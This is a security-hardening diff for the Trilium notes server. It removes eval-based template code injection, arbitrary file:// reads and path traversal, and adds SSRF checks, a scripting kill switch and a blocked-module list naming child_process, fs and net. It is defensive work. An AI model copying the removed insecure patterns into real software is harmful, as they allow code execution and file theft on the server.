@@ -67,3 +67,13 @@ oauthIssuerName=
 # Set the issuer icon for OAuth/OpenID authentication
 # This is the icon of the service that will be used to verify the user's identity
 oauthIssuerIcon=
+
+[Scripting]
+# Enable backend/frontend script execution. WARNING: Scripts have full server access including
+# filesystem, network, and OS commands via require('child_process'). Only enable if you trust
+# all users with admin-level access to the server.
+# Desktop builds override this to true automatically.
+enabled=false
+
+# Enable the SQL console (allows raw SQL execution against the database)
+sqlConsoleEnabled=false

apps/server/src/routes/api/branches.ts

@@ -171,7 +171,8 @@ function setExpandedForSubtree(req: Request<{ branchId: string, expanded: string
     // root is always expanded
     branchIds = branchIds.filter((branchId) => branchId !== "none_root");
 
-    sql.executeMany(/*sql*/`UPDATE branches SET isExpanded = ${expanded} WHERE branchId IN (???)`, branchIds);
+    const expandedValue = expanded ? 1 : 0;
+    sql.executeMany(/*sql*/`UPDATE branches SET isExpanded = ${expandedValue} WHERE branchId IN (???)`, branchIds);
 
     for (const branchId of branchIds) {
         const branch = becca.branches[branchId];

apps/server/src/routes/api/files.ts

@@ -1,6 +1,7 @@
 import chokidar from "chokidar";
 import type { Request, Response } from "express";
 import fs from "fs";
+import path from "path";
 import { Readable } from "stream";
 import tmp from "tmp";
 
@@ -203,13 +204,36 @@ function saveToTmpDir(fileName: string, content: string | Buffer, entityType: st
     };
 }
 
+/**
+ * Validates that the given file path is a known temporary file created by this server
+ * and resides within the expected temporary directory. This prevents path traversal
+ * attacks (CWE-22) where an attacker could read arbitrary files from the filesystem.
+ */
+function validateTemporaryFilePath(filePath: string): void {
+    if (!filePath || typeof filePath !== "string") {
+        throw new ValidationError("Missing or invalid file path.");
+    }
+
+    // Check 1: The file must be in our set of known temporary files created by saveToTmpDir().
+    if (!createdTemporaryFiles.has(filePath)) {
+        throw new ValidationError(`File '${filePath}' is not a tracked temporary file.`);
+    }
+
+    // Check 2 (defense-in-depth): Resolve to an absolute path and verify it is within TMP_DIR.
+    // This guards against any future bugs where a non-temp path could end up in the set.
+    const resolvedPath = path.resolve(filePath);
+    const resolvedTmpDir = path.resolve(dataDirs.TMP_DIR);
+
+    if (!resolvedPath.startsWith(resolvedTmpDir + path.sep) && resolvedPath !== resolvedTmpDir) {
+        throw new ValidationError(`File path '${filePath}' is outside the temporary directory.`);
+    }
+}
+
 function uploadModifiedFileToNote(req: Request<{ noteId: string }>) {
     const noteId = req.params.noteId;
     const { filePath } = req.body;
 
-    if (!createdTemporaryFiles.has(filePath)) {
-        throw new ValidationError(`File '${filePath}' is not a temporary file.`);
-    }
+    validateTemporaryFilePath(filePath);
 
     const note = becca.getNoteOrThrow(noteId);
 
@@ -230,9 +254,7 @@ function uploadModifiedFileToAttachment(req: Request<{ attachmentId: string }>)
     const { attachmentId } = req.params;
     const { filePath } = req.body;
 
-    if (!createdTemporaryFiles.has(filePath)) {
-        throw new ValidationError(`File '${filePath}' is not a temporary file.`);
-    }
+    validateTemporaryFilePath(filePath);
 
     const attachment = becca.getAttachmentOrThrow(attachmentId);
 

apps/server/src/routes/api/image.spec.ts

@@ -10,6 +10,21 @@ describe("Image API", () => {
         expect(response.headers["Content-Type"]).toBe("image/svg+xml");
         expect(response.body).toBe(`<svg xmlns="http://www.w3.org/2000/svg"></svg>`);
     });
+
+    it("sets Content-Security-Policy header on SVG responses", () => {
+        const parentNote = note("note").note;
+        const response = new MockResponse();
+        renderSvgAttachment(parentNote, response as any, "attachment");
+        expect(response.headers["Content-Security-Policy"]).toBeDefined();
+        expect(response.headers["Content-Security-Policy"]).toContain("default-src 'none'");
+    });
+
+    it("sets X-Content-Type-Options header on SVG responses", () => {
+        const parentNote = note("note").note;
+        const response = new MockResponse();
+        renderSvgAttachment(parentNote, response as any, "attachment");
+        expect(response.headers["X-Content-Type-Options"]).toBe("nosniff");
+    });
 });
 
 class MockResponse {

apps/server/src/routes/api/image.ts

@@ -6,6 +6,7 @@ import type BNote from "../../becca/entities/bnote.js";
 import type BRevision from "../../becca/entities/brevision.js";
 import imageService from "../../services/image.js";
 import { RESOURCE_DIR } from "../../services/resource_dir.js";
+import { setSvgHeaders } from "../../services/svg_sanitizer.js";
 import { sanitizeSvg } from "../../services/utils.js";
 
 function returnImageFromNote(req: Request<{ noteId: string }>, res: Response) {
@@ -143,6 +144,6 @@ export default {
 
 function sendSanitizedSvg(res: Response, content: string | Buffer) {
     const svgString = typeof content === "string" ? content : content.toString("utf-8");
-    res.set("Content-Security-Policy", "script-src 'none'");
+    setSvgHeaders(res);
     res.send(sanitizeSvg(svgString));
 }

apps/server/src/routes/api/login.ts

@@ -78,7 +78,7 @@ import recoveryCodeService from "../../services/encryption/recovery_codes";
  *                   type: string
  *                   example: "Auth request time is out of sync, please check that both client and server have correct time. The difference between clocks has to be smaller than 5 minutes"
  */
-function loginSync(req: Request) {
+async function loginSync(req: Request) {
     if (!sqlInit.schemaExists()) {
         return [500, { message: "DB schema does not exist, can't sync." }];
     }
@@ -112,6 +112,17 @@ function loginSync(req: Request) {
         return [400, { message: "Sync login credentials are incorrect. It looks like you're trying to sync two different initialized documents which is not possible." }];
     }
 
+    // Regenerate session to prevent session fixation attacks.
+    await new Promise<void>((resolve, reject) => {
+        req.session.regenerate((err) => {
+            if (err) {
+                reject(err);
+            } else {
+                resolve();
+            }
+        });
+    });
+
     req.session.loggedIn = true;
 
     return {

apps/server/src/routes/api/options.ts

@@ -115,17 +115,31 @@ const ALLOWED_OPTIONS = new Set<OptionNames>([
     "ocrMinConfidence"
 ]);
 
+// Options that contain secrets (API keys, tokens, etc.).
+// These can be written by the client but are never sent back in GET responses.
+const WRITE_ONLY_OPTIONS = new Set<string>([
+    "openaiApiKey",
+    "anthropicApiKey"
+]);
+
 function getOptions() {
     const optionMap = optionService.getOptionMap();
     const resultMap: Record<string, string> = {};
 
     for (const optionName in optionMap) {
-        if (isAllowed(optionName)) {
+        if (isReadable(optionName)) {
             resultMap[optionName] = optionMap[optionName as OptionNames];
         }
     }
 
     resultMap["isPasswordSet"] = optionMap["passwordVerificationHash"] ? "true" : "false";
+
+    // Expose boolean flags for write-only (secret) options so the client
+    // knows whether a value has been configured without revealing the value.
+    for (const secretOption of WRITE_ONLY_OPTIONS) {
+        resultMap[`is${secretOption.charAt(0).toUpperCase()}${secretOption.slice(1)}Set`] =
+            optionMap[secretOption] ? "true" : "false";
+    }
     // if database is read-only, disable editing in UI by setting 0 here
     if (config.General.readOnly) {
         resultMap["autoReadonlySizeText"] = "0";
@@ -160,7 +174,10 @@ function update(name: string, value: string) {
     }
 
     if (name !== "openNoteContexts") {
-        log.info(`Updating option '${name}' to '${value}'`);
+        const logValue = (WRITE_ONLY_OPTIONS as Set<string>).has(name)
+            ? "[redacted]"
+            : value;
+        log.info(`Updating option '${name}' to '${logValue}'`);
     }
 
     optionService.setOption(name as OptionNames, value);
@@ -194,13 +211,20 @@ function getUserThemes() {
     return ret;
 }
 
-function isAllowed(name: string) {
+/** Check if an option can be read by the client (GET responses). */
+function isReadable(name: string) {
     return (ALLOWED_OPTIONS as Set<string>).has(name)
         || name.startsWith("keyboardShortcuts")
         || name.endsWith("Collapsed")
         || name.startsWith("hideArchivedNotes");
 }
 
+/** Check if an option can be written by the client (PUT requests). */
+function isAllowed(name: string) {
+    return isReadable(name)
+        || (WRITE_ONLY_OPTIONS as Set<string>).has(name);
+}
+
 export default {
     getOptions,
     updateOption,

apps/server/src/routes/api/script.ts

@@ -8,6 +8,7 @@ import scriptService, { type Bundle } from "../../services/script.js";
 import sql from "../../services/sql.js";
 import syncService from "../../services/sync.js";
 import { safeExtractMessageAndStackFromError } from "../../services/utils.js";
+import { assertScriptingEnabled, isScriptingEnabled } from "../../services/scripting_guard.js";
 
 interface ScriptBody {
     script: string;
@@ -23,6 +24,7 @@ interface ScriptBody {
 // need to await it and make the complete response including metadata available in a Promise, so that the route detects
 // this and does result.then().
 async function exec(req: Request) {
+    assertScriptingEnabled();
     try {
         const body = req.body as ScriptBody;
 
@@ -45,6 +47,7 @@ async function exec(req: Request) {
 }
 
 function run(req: Request<{ noteId: string }>) {
+    assertScriptingEnabled();
     const note = becca.getNoteOrThrow(req.params.noteId);
 
     const result = scriptService.executeNote(note, { originEntity: note });
@@ -69,6 +72,10 @@ function getBundlesWithLabel(label: string, value?: string) {
 }
 
 function getStartupBundles(req: Request) {
+    if (!isScriptingEnabled()) {
+        return [];
+    }
+
     if (!process.env.TRILIUM_SAFE_MODE) {
         if (req.query.mobile === "true") {
             return getBundlesWithLabel("run", "mobileStartup");
@@ -81,6 +88,10 @@ function getStartupBundles(req: Request) {
 }
 
 function getWidgetBundles() {
+    if (!isScriptingEnabled()) {
+        return [];
+    }
+
     if (!process.env.TRILIUM_SAFE_MODE) {
         return getBundlesWithLabel("widget");
     } 
@@ -89,6 +100,10 @@ function getWidgetBundles() {
 }
 
 function getRelationBundles(req: Request<{ noteId: string, relationName: string }>) {
+    if (!isScriptingEnabled()) {
+        return [];
+    }
+
     const noteId = req.params.noteId;
     const note = becca.getNoteOrThrow(noteId);
     const relationName = req.params.relationName;
@@ -118,6 +133,8 @@ function getRelationBundles(req: Request<{ noteId: string, relationName: string
 }
 
 function getBundle(req: Request<{ noteId: string }>) {
+    assertScriptingEnabled();
+
     const note = becca.getNoteOrThrow(req.params.noteId);
     const { script, params } = req.body ?? {};
 

apps/server/src/routes/api/sql.ts

@@ -4,6 +4,7 @@ import becca from "../../becca/becca.js";
 import ValidationError from "../../errors/validation_error.js";
 import sql from "../../services/sql.js";
 import { safeExtractMessageAndStackFromError } from "../../services/utils.js";
+import { assertSqlConsoleEnabled } from "../../services/scripting_guard.js";
 
 interface Table {
     name: string;
@@ -25,6 +26,7 @@ function getSchema() {
 }
 
 function execute(req: Request<{ noteId: string }>) {
+    assertSqlConsoleEnabled();
     const note = becca.getNoteOrThrow(req.params.noteId);
 
     const content = note.getContent();

apps/server/src/routes/csrf_protection.ts

@@ -3,6 +3,7 @@ import { doubleCsrf } from "csrf-csrf";
 
 import sessionSecret from "../services/session_secret.js";
 import { isElectron } from "../services/utils.js";
+import config from "../services/config.js";
 
 export const CSRF_COOKIE_NAME = "trilium-csrf";
 
@@ -16,7 +17,7 @@ const doubleCsrfUtilities = doubleCsrf({
     getSecret: () => sessionSecret,
     cookieOptions: {
         path: "/",
-        secure: false,
+        secure: config.Network.https,
         sameSite: "strict",
         httpOnly: !isElectron // set to false for Electron, see https://github.com/TriliumNext/Trilium/pull/966
     },

apps/server/src/routes/custom.ts

@@ -6,9 +6,15 @@ import sql from "../services/sql.js";
 import becca from "../becca/becca.js";
 import type { Request, Response, Router } from "express";
 import { safeExtractMessageAndStackFromError, normalizeCustomHandlerPattern } from "../services/utils.js";
+import { isScriptingEnabled } from "../services/scripting_guard.js";
 
 function handleRequest(req: Request, res: Response) {
 
+    if (!isScriptingEnabled()) {
+        res.status(403).send("Script execution is disabled on this server.");
+        return;
+    }
+
     // handle path from "*path" route wildcard
     // in express v4, you could just add
     // req.params.path + req.params[0], but with v5
@@ -64,6 +70,14 @@ function handleRequest(req: Request, res: Response) {
         if (attr.name === "customRequestHandler") {
             const note = attr.getNote();
 
+            // Require authentication unless note has #customRequestHandlerPublic label
+            if (!note.hasLabel("customRequestHandlerPublic")) {
+                if (!req.session?.loggedIn) {
+                    res.status(401).send("Authentication required for this endpoint.");
+                    return;
+                }
+            }
+
             log.info(`Handling custom request '${path}' with note '${note.noteId}'`);
 
             try {

apps/server/src/routes/routes.ts

@@ -15,7 +15,7 @@ import etapiSpecRoute from "../etapi/spec.js";
 import etapiSpecialNoteRoutes from "../etapi/special_notes.js";
 import auth from "../services/auth.js";
 import openID from '../services/open_id.js';
-import { isElectron } from "../services/utils.js";
+
 import shareRoutes from "../share/routes.js";
 import appInfoRoute from "./api/app_info.js";
 import attachmentsApiRoute from "./api/attachments.js";
@@ -258,7 +258,7 @@ function register(app: express.Application) {
     apiRoute(PST, "/api/bulk-action/execute", bulkActionRoute.execute);
     apiRoute(PST, "/api/bulk-action/affected-notes", bulkActionRoute.getAffectedNoteCount);
 
-    route(PST, "/api/login/sync", [loginRateLimiter], loginApiRoute.loginSync, apiResultHandler);
+    asyncRoute(PST, "/api/login/sync", [loginRateLimiter], loginApiRoute.loginSync, apiResultHandler);
     // this is for entering protected mode so user has to be already logged-in (that's the reason we don't require username)
     apiRoute(PST, "/api/login/protected", loginApiRoute.loginToProtectedSession);
     apiRoute(PST, "/api/login/protected/touch", loginApiRoute.touchProtectedSession);
@@ -271,8 +271,10 @@ function register(app: express.Application) {
     apiRoute(PATCH, "/api/etapi-tokens/:etapiTokenId", etapiTokensApiRoutes.patchToken);
     apiRoute(DEL, "/api/etapi-tokens/:etapiTokenId", etapiTokensApiRoutes.deleteToken);
 
-    // in case of local electron, local calls are allowed unauthenticated, for server they need auth
-    const clipperMiddleware = isElectron ? [] : [auth.checkEtapiToken];
+    // clipper API always requires ETAPI token authentication, regardless of environment.
+    // Previously, Electron builds skipped auth entirely, which exposed these endpoints
+    // to unauthenticated network access (content injection, information disclosure).
+    const clipperMiddleware = [auth.checkEtapiToken];
 
     route(GET, "/api/clipper/handshake", clipperMiddleware, clipperRoute.handshake, apiResultHandler);
     asyncRoute(PST, "/api/clipper/clippings", clipperMiddleware, clipperRoute.addClipping, apiResultHandler);

apps/server/src/routes/session_parser.ts

@@ -107,6 +107,8 @@ const sessionParser: express.RequestHandler = session({
     cookie: {
         path: "/",
         httpOnly: true,
+        secure: config.Network.https,
+        sameSite: "lax",
         maxAge: config.Session.cookieMaxAge * 1000 // needs value in milliseconds
     },
     name: "trilium.sid",

apps/server/src/services/backup.ts

@@ -72,9 +72,16 @@ function periodBackup(optionName: "lastDailyBackupDate" | "lastWeeklyBackupDate"
 }
 
 async function backupNow(name: string) {
+    // Sanitize backup name to prevent path traversal (CWE-22).
+    // Only allow alphanumeric characters, hyphens, and underscores.
+    const sanitizedName = name.replace(/[^a-zA-Z0-9_-]/g, "");
+    if (!sanitizedName) {
+        throw new Error("Invalid backup name: must contain at least one alphanumeric character, hyphen, or underscore.");
+    }
+
     // we don't want to back up DB in the middle of sync with potentially inconsistent DB state
     return await syncMutexService.doExclusively(async () => {
-        const backupFile = path.resolve(`${dataDir.BACKUP_DIR}/backup-${name}.db`);
+        const backupFile = path.resolve(`${dataDir.BACKUP_DIR}/backup-${sanitizedName}.db`);
 
         if (!fs.existsSync(dataDir.BACKUP_DIR)) {
             fs.mkdirSync(dataDir.BACKUP_DIR, 0o700);

apps/server/src/services/bulk_actions.ts

@@ -6,6 +6,9 @@ import { randomString } from "./utils.js";
 import eraseService from "./erase.js";
 import type BNote from "../becca/entities/bnote.js";
 import { ActionHandlers, BulkAction, BulkActionData } from "@triliumnext/commons";
+import { evaluateTemplate } from "./safe_template.js";
+import { executeBundle } from "./script.js";
+import { assertScriptingEnabled } from "./scripting_guard.js";
 
 type ActionHandler<T> = (action: T, note: BNote) => void;
 
@@ -44,9 +47,8 @@ const ACTION_HANDLERS: ActionHandlerMap = {
     },
     renameNote: (action, note) => {
         // "officially" injected value:
-        // - note
-
-        const newTitle = eval(`\`${action.newTitle}\``);
+        // - note (the note being renamed)
+        const newTitle = evaluateTemplate(action.newTitle, { note });
 
         if (note.title !== newTitle) {
             note.title = newTitle;
@@ -105,15 +107,26 @@ const ACTION_HANDLERS: ActionHandlerMap = {
         }
     },
     executeScript: (action, note) => {
+        assertScriptingEnabled();
         if (!action.script || !action.script.trim()) {
             log.info("Ignoring executeScript since the script is empty.");
             return;
         }
 
-        const scriptFunc = new Function("note", action.script);
-        scriptFunc(note);
+        // Route through the script service's executeBundle instead of raw
+        // new Function() to get proper CLS context, logging, and error handling.
+        // The preamble provides access to `note` and `api` as the UI documents.
+        const noteId = note.noteId.replace(/[^a-zA-Z0-9_]/g, "");
+        const preamble = `const api = apiContext.apis["${noteId}"] || {};\n` +
+            `const note = apiContext.notes["${noteId}"];\n`;
+        const scriptBody = `${preamble}${action.script}\nnote.save();`;
 
-        note.save();
+        executeBundle({
+            note: note,
+            script: scriptBody,
+            html: "",
+            allNotes: [note]
+        });
     }
 } as const;
 

apps/server/src/services/config.ts

@@ -136,7 +136,14 @@ export interface TriliumConfig {
          * log files created by Trilium older than the specified amount of time will be deleted.
          */
         retentionDays: number;
-    }
+    };
+    /** Scripting and code execution configuration */
+    Scripting: {
+        /** Whether backend/frontend script execution is enabled (default: false for server, true for desktop) */
+        enabled: boolean;
+        /** Whether the SQL console is accessible (default: false) */
+        sqlConsoleEnabled: boolean;
+    };
 }
 
 /**
@@ -458,6 +465,21 @@ const configMapping = {
             defaultValue: LOGGING_DEFAULT_RETENTION_DAYS,
             transformer: (value: unknown) => stringToInt(String(value)) ?? LOGGING_DEFAULT_RETENTION_DAYS
         }
+    },
+    Scripting: {
+        enabled: {
+            standardEnvVar: 'TRILIUM_SCRIPTING_ENABLED',
+            iniGetter: () => getIniSection("Scripting")?.enabled,
+            defaultValue: false,
+            transformer: transformBoolean
+        },
+        sqlConsoleEnabled: {
+            standardEnvVar: 'TRILIUM_SCRIPTING_SQLCONSOLEENABLED',
+            aliasEnvVars: ['TRILIUM_SCRIPTING_SQL_CONSOLE_ENABLED'],
+            iniGetter: () => getIniSection("Scripting")?.sqlConsoleEnabled,
+            defaultValue: false,
+            transformer: transformBoolean
+        }
     }
 };
 
@@ -511,9 +533,19 @@ const config: TriliumConfig = {
     },
     Logging: {
         retentionDays: getConfigValue(configMapping.Logging.retentionDays)
+    },
+    Scripting: {
+        enabled: getConfigValue(configMapping.Scripting.enabled),
+        sqlConsoleEnabled: getConfigValue(configMapping.Scripting.sqlConsoleEnabled)
     }
 };
 
+// Desktop builds always have scripting enabled (single-user trusted environment)
+if (process.versions["electron"]) {
+    config.Scripting.enabled = true;
+    config.Scripting.sqlConsoleEnabled = true;
+}
+
 /**
  * =====================================================================
  * ENVIRONMENT VARIABLE REFERENCE

apps/server/src/services/handlers.ts

@@ -12,11 +12,12 @@ import log from "./log.js";
 import type BNote from "../becca/entities/bnote.js";
 import type AbstractBeccaEntity from "../becca/entities/abstract_becca_entity.js";
 import type { DefinitionObject } from "./promoted_attribute_definition_interface.js";
+import { isScriptingEnabled } from "./scripting_guard.js";
 
 type Handler = (definition: DefinitionObject, note: BNote, targetNote: BNote) => void;
 
 function runAttachedRelations(note: BNote, relationName: string, originEntity: AbstractBeccaEntity<any>) {
-    if (!note) {
+    if (!note || !isScriptingEnabled()) {
         return;
     }
 

apps/server/src/services/notes.ts

@@ -25,8 +25,10 @@ import type { NoteParams } from "./note-interface.js";
 import optionService from "./options.js";
 import request from "./request.js";
 import revisionService from "./revisions.js";
+import { evaluateTemplateSafe } from "./safe_template.js";
 import sql from "./sql.js";
 import type TaskContext from "./task_context.js";
+import { isSafeUrlForFetch } from "./url_validator.js";
 import ws from "./ws.js";
 
 interface FoundLink {
@@ -119,17 +121,17 @@ function getNewNoteTitle(parentNote: BNote) {
     const titleTemplate = parentNote.getLabelValue("titleTemplate");
 
     if (titleTemplate !== null) {
-        try {
-            const now = dayjs(cls.getLocalNowDateTime() || new Date());
+        const now = dayjs(cls.getLocalNowDateTime() || new Date());
 
-            // "officially" injected values:
-            // - now
-            // - parentNote
-
-            title = eval(`\`${titleTemplate}\``);
-        } catch (e: any) {
-            log.error(`Title template of note '${parentNote.noteId}' failed with: ${e.message}`);
-        }
+        // "officially" injected values:
+        // - now
+        // - parentNote
+        title = evaluateTemplateSafe(
+            titleTemplate,
+            { now, parentNote },
+            title,
+            `titleTemplate of note '${parentNote.noteId}'`
+        );
     }
 
     // this isn't in theory a good place to sanitize title, but this will catch a lot of XSS attempts.
@@ -503,24 +505,14 @@ const imageUrlToAttachmentIdMapping: Record<string, string> = {};
 async function downloadImage(noteId: string, imageUrl: string) {
     const unescapedUrl = unescapeHtml(imageUrl);
 
+    // SSRF protection: only allow http(s) URLs and block private/internal IPs.
+    if (!isSafeUrlForFetch(unescapedUrl)) {
+        log.error(`Download of '${imageUrl}' for note '${noteId}' rejected: URL failed SSRF safety check.`);
+        return;
+    }
+
     try {
-        let imageBuffer: Buffer;
-
-        if (imageUrl.toLowerCase().startsWith("file://")) {
-            imageBuffer = await new Promise((res, rej) => {
-                const localFilePath = imageUrl.substring("file://".length);
-
-                return fs.readFile(localFilePath, (err, data) => {
-                    if (err) {
-                        rej(err);
-                    } else {
-                        res(data);
-                    }
-                });
-            });
-        } else {
-            imageBuffer = await request.getImage(unescapedUrl);
-        }
+        const imageBuffer = await request.getImage(unescapedUrl);
 
         const parsedUrl = url.parse(unescapedUrl);
         const title = path.basename(parsedUrl.pathname || "");

apps/server/src/services/safe_template.ts

@@ -0,0 +1,188 @@
+/**
+ * Safe template evaluator that replaces eval()-based template string interpolation.
+ *
+ * Supports only a controlled set of operations within ${...} expressions:
+ * - Property access chains: `obj.prop.subprop`
+ * - Method calls with a single string literal argument: `obj.method('arg')`
+ * - Chained combinations: `obj.prop.method('arg')`
+ *
+ * This prevents arbitrary code execution while supporting the documented
+ * titleTemplate and bulk rename use cases:
+ * - ${now.format('YYYY-MM-DD')}
+ * - ${parentNote.title}
+ * - ${parentNote.getLabelValue('authorName')}
+ * - ${note.title}
+ * - ${note.dateCreatedObj.format('MM-DD')}
+ */
+
+import log from "./log.js";
+
+/** Allowed method names that can be called on template variables. */
+const ALLOWED_METHODS = new Set([
+    "format",
+    "getLabelValue",
+    "getLabel",
+    "getLabelValues",
+    "getRelationValue",
+    "getAttributeValue"
+]);
+
+/** Allowed property names that can be accessed on template variables. */
+const ALLOWED_PROPERTIES = new Set([
+    "title",
+    "type",
+    "mime",
+    "noteId",
+    "dateCreated",
+    "dateModified",
+    "utcDateCreated",
+    "utcDateModified",
+    "dateCreatedObj",
+    "utcDateCreatedObj",
+    "isProtected",
+    "content"
+]);
+
+interface TemplateVariables {
+    [key: string]: unknown;
+}
+
+/**
+ * Evaluates a template string safely without using eval().
+ *
+ * Template strings can contain ${...} expressions which are evaluated
+ * against the provided variables map.
+ *
+ * @param template - The template string, e.g. "Note: ${now.format('YYYY-MM-DD')}"
+ * @param variables - Map of variable names to their values
+ * @returns The interpolated string
+ * @throws Error if an expression cannot be safely evaluated
+ */
+export function evaluateTemplate(template: string, variables: TemplateVariables): string {
+    return template.replace(/\$\{([^}]+)\}/g, (_match, expression: string) => {
+        const result = evaluateExpression(expression.trim(), variables);
+        return result == null ? "" : String(result);
+    });
+}
+
+/**
+ * Evaluates a single expression like "now.format('YYYY-MM-DD')" or "parentNote.title".
+ *
+ * Supported forms:
+ * - `varName` -> variables[varName]
+ * - `varName.prop` -> variables[varName].prop
+ * - `varName.prop1.prop2` -> variables[varName].prop1.prop2
+ * - `varName.method('arg')` -> variables[varName].method('arg')
+ * - `varName.prop.method('arg')` -> variables[varName].prop.method('arg')
+ */
+function evaluateExpression(expr: string, variables: TemplateVariables): unknown {
+    // Parse the expression into segments: variable name, property accesses, and optional method call.
+    // We handle: varName(.propName)*.methodName('stringArg')?
+
+    // First, check for a method call at the end: .methodName('arg') or .methodName("arg")
+    const methodCallMatch = expr.match(
+        /^([a-zA-Z_]\w*(?:\.[a-zA-Z_]\w*)*)\.([a-zA-Z_]\w*)\(\s*(?:'([^']*)'|"([^"]*)")\s*\)$/
+    );
+
+    if (methodCallMatch) {
+        const [, chainStr, methodName, singleQuoteArg, doubleQuoteArg] = methodCallMatch;
+        const methodArg = singleQuoteArg !== undefined ? singleQuoteArg : doubleQuoteArg;
+
+        if (!ALLOWED_METHODS.has(methodName)) {
+            throw new Error(`Method '${methodName}' is not allowed in template expressions`);
+        }
+
+        const target = resolvePropertyChain(chainStr, variables);
+        if (target == null) {
+            return null;
+        }
+
+        const method = (target as Record<string, unknown>)[methodName];
+        if (typeof method !== "function") {
+            throw new Error(`'${methodName}' is not a function on the resolved object`);
+        }
+
+        return (method as (arg: string) => unknown).call(target, methodArg as string);
+    }
+
+    // Check for a no-arg method call at the end: .methodName()
+    const noArgMethodMatch = expr.match(
+        /^([a-zA-Z_]\w*(?:\.[a-zA-Z_]\w*)*)\.([a-zA-Z_]\w*)\(\s*\)$/
+    );
+
+    if (noArgMethodMatch) {
+        const [, chainStr, methodName] = noArgMethodMatch;
+
+        if (!ALLOWED_METHODS.has(methodName)) {
+            throw new Error(`Method '${methodName}' is not allowed in template expressions`);
+        }
+
+        const target = resolvePropertyChain(chainStr, variables);
+        if (target == null) {
+            return null;
+        }
+
+        const method = (target as Record<string, unknown>)[methodName];
+        if (typeof method !== "function") {
+            throw new Error(`'${methodName}' is not a function on the resolved object`);
+        }
+
+        return (method as () => unknown).call(target);
+    }
+
+    // Otherwise it's a pure property chain: varName.prop1.prop2...
+    const propChainMatch = expr.match(/^[a-zA-Z_]\w*(?:\.[a-zA-Z_]\w*)*$/);
+    if (!propChainMatch) {
+        throw new Error(`Template expression '${expr}' is not a supported expression. ` +
+            `Only property access and whitelisted method calls are allowed.`);
+    }
+
+    return resolvePropertyChain(expr, variables);
+}
+
+/**
+ * Resolves a dot-separated property chain like "parentNote.title" against variables.
+ */
+function resolvePropertyChain(chain: string, variables: TemplateVariables): unknown {
+    const parts = chain.split(".");
+    const rootName = parts[0];
+
+    if (!(rootName in variables)) {
+        throw new Error(`Unknown variable '${rootName}' in template expression`);
+    }
+
+    let current: unknown = variables[rootName];
+
+    for (let i = 1; i < parts.length; i++) {
+        if (current == null) {
+            return null;
+        }
+
+        const prop = parts[i];
+        if (!ALLOWED_PROPERTIES.has(prop)) {
+            throw new Error(`Property '${prop}' is not allowed in template expressions`);
+        }
+
+        current = (current as Record<string, unknown>)[prop];
+    }
+
+    return current;
+}
+
+/**
+ * Convenience wrapper that evaluates a template and catches errors,
+ * logging them and returning the fallback value.
+ */
+export function evaluateTemplateSafe(
+    template: string,
+    variables: TemplateVariables,
+    fallback: string,
+    contextDescription: string
+): string {
+    try {
+        return evaluateTemplate(template, variables);
+    } catch (e: any) {
+        log.error(`Template evaluation for ${contextDescription} failed with: ${e.message}`);
+        return fallback;
+    }
+}

apps/server/src/services/scheduler.ts

@@ -8,6 +8,7 @@ import hiddenSubtreeService from "./hidden_subtree.js";
 import type BNote from "../becca/entities/bnote.js";
 import options from "./options.js";
 import { getLastProtectedSessionOperationDate, isProtectedSessionAvailable, resetDataKey } from "./protected_session.js";
+import { isScriptingEnabled } from "./scripting_guard.js";
 import ws from "./ws.js";
 
 function getRunAtHours(note: BNote): number[] {
@@ -45,7 +46,7 @@ export function startScheduler() {
 
     // Periodic checks.
     sqlInit.dbReady.then(() => {
-        if (!process.env.TRILIUM_SAFE_MODE) {
+        if (!process.env.TRILIUM_SAFE_MODE && isScriptingEnabled()) {
             setTimeout(
                 cls.wrap(() => runNotesWithLabel("backendStartup")),
                 10 * 1000
@@ -60,13 +61,14 @@ export function startScheduler() {
                 cls.wrap(() => runNotesWithLabel("daily")),
                 24 * 3600 * 1000
             );
-
-            setInterval(
-                cls.wrap(() => hiddenSubtreeService.checkHiddenSubtree()),
-                7 * 3600 * 1000
-            );
         }
 
+        // Internal maintenance - always runs regardless of scripting setting
+        setInterval(
+            cls.wrap(() => hiddenSubtreeService.checkHiddenSubtree()),
+            7 * 3600 * 1000
+        );
+
         setInterval(() => checkProtectedSessionExpiration(), 30000);
     });
 }

apps/server/src/services/script_context.ts

@@ -3,6 +3,51 @@ import BackendScriptApi from "./backend_script_api.js";
 import type BNote from "../becca/entities/bnote.js";
 import type { ApiParams } from "./backend_script_api_interface.js";
 
+/**
+ * IMPORTANT: This module allowlist/blocklist is a defense-in-depth measure only.
+ * It is NOT a security sandbox. Scripts execute via eval() in the main Node.js
+ * process and can bypass these restrictions through globalThis, process, etc.
+ * The actual security boundary is the [Scripting] enabled=false config toggle,
+ * which prevents script execution entirely.
+ *
+ * Modules that are safe for user scripts to require.
+ * Note-based modules (resolved via note title matching) are handled separately
+ * and always allowed regardless of this list.
+ */
+const ALLOWED_MODULES = new Set([
+    // Safe utility libraries
+    "dayjs",
+    "marked",
+    "turndown",
+    "cheerio",
+    "axios",
+    "xml2js",
+    "escape-html",
+    "sanitize-html",
+    "lodash",
+]);
+
+/**
+ * Modules that are ALWAYS blocked even when scripting is enabled.
+ * These provide OS-level access that makes RCE trivial.
+ */
+const BLOCKED_MODULES = new Set([
+    "child_process",
+    "cluster",
+    "dgram",
+    "dns",
+    "fs",
+    "fs/promises",
+    "net",
+    "os",
+    "path",
+    "process",
+    "tls",
+    "worker_threads",
+    "v8",
+    "vm",
+]);
+
 type Module = {
     exports: any[];
 };
@@ -26,7 +71,23 @@ class ScriptContext {
             const note = candidates.find((c) => c.title === moduleName);
 
             if (!note) {
-                return require(moduleName);
+                // Check blocked list first
+                if (BLOCKED_MODULES.has(moduleName)) {
+                    throw new Error(
+                        `Module '${moduleName}' is blocked for security. ` +
+                        `Scripts cannot access OS-level modules like child_process, fs, net, os.`
+                    );
+                }
+
+                // Allow if in whitelist
+                if (ALLOWED_MODULES.has(moduleName)) {
+                    return require(moduleName);
+                }
+
+                throw new Error(
+                    `Module '${moduleName}' is not in the allowed modules list. ` +
+                    `Contact your administrator to add it to the whitelist.`
+                );
             }
 
             return this.modules[note.noteId].exports;

apps/server/src/services/scripting_guard.spec.ts

@@ -0,0 +1,148 @@
+import { vi, describe, it, expect, beforeEach } from "vitest";
+
+// Mutable mock state that can be changed between tests
+const mockState = {
+    isElectron: false,
+    scriptingEnabled: false,
+    sqlConsoleEnabled: false
+};
+
+// Mock utils module so isElectron can be controlled per test
+vi.mock("./utils.js", () => ({
+    isElectron: false,
+    default: {
+        isElectron: false
+    }
+}));
+
+// Mock config module so Scripting section can be controlled per test
+vi.mock("./config.js", () => ({
+    default: {
+        Scripting: {
+            get enabled() {
